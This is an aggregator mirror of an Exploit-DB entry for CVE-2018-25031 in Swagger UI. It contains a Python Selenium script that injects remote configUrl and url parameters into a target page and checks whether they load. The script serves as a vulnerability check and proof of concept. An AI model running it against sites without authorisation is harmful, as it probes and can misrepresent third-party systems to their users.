[webapps] Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical I...
source link: https://www.exploit-db.com/exploits/51379
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
EDB-ID:
51379
EDB Verified:
# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
# Date: 14 April, 2023
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://swagger.io/
# Version: < 4.1.3
# CVE: CVE-2018-25031
# Site: https://rafaelcintralopes.com.br/
# Usage: python swagger-exploit.py https://[swagger-page].com
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome.service import Service
import time
import json
import sys
if __name__ == "__main__":
target = sys.argv[1]
desired_capabilities = DesiredCapabilities.CHROME
desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}
options = webdriver.ChromeOptions()
options.add_argument("--headless")
options.add_argument("--ignore-certificate-errors")
options.add_argument("--log-level=3")
options.add_experimental_option("excludeSwitches", ["enable-logging"])
# Browser webdriver path
drive_service = Service("C:/chromedriver.exe")
driver = webdriver.Chrome(service=drive_service,
options=options,
desired_capabilities=desired_capabilities)
driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json")
time.sleep(10)
driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json")
time.sleep(10)
logs = driver.get_log("performance")
with open("log_file.json", "w", encoding="utf-8") as f:
f.write("[")
for log in logs:
log_file = json.loads(log["message"])["message"]
if("Network.response" in log_file["method"]
or "Network.request" in log_file["method"]
or "Network.webSocket" in log_file["method"]):
f.write(json.dumps(log_file)+",")
f.write("{}]")
driver.quit()
json_file_path = "log_file.json"
with open(json_file_path, "r", encoding="utf-8") as f:
logs = json.loads(f.read())
for log in logs:
try:
url = log["params"]["request"]["url"]
if(url == "https://petstore.swagger.io/v2/hacked1.json"):
print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")
if(url == "https://petstore.swagger.io/v2/hacked2.json"):
print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")
except Exception as e:
pass
Recommend
-
5
Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripti...
-
5
atrocore 1.5.25 User interaction - Unauthenticated File upload - RCE...
-
15
Ulicms 2023.1 - create admin user via mass assignment ...
-
2
Thruk Monitoring Web Interface 3.06 - Path Traversal ...
-
4
There are certain criteria that brands must meet if they want their offers and products to be featured on Google. Nicol...
-
2
Monitoring Critical User Journeys in Azure Aug 07, 2023 17 m...
-
5
User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XS...
-
4
mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page...
-
4
Failure to comply with the updated policy could result in the suspension of your Google Ads account. Nicola Agius o...
-
5
SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK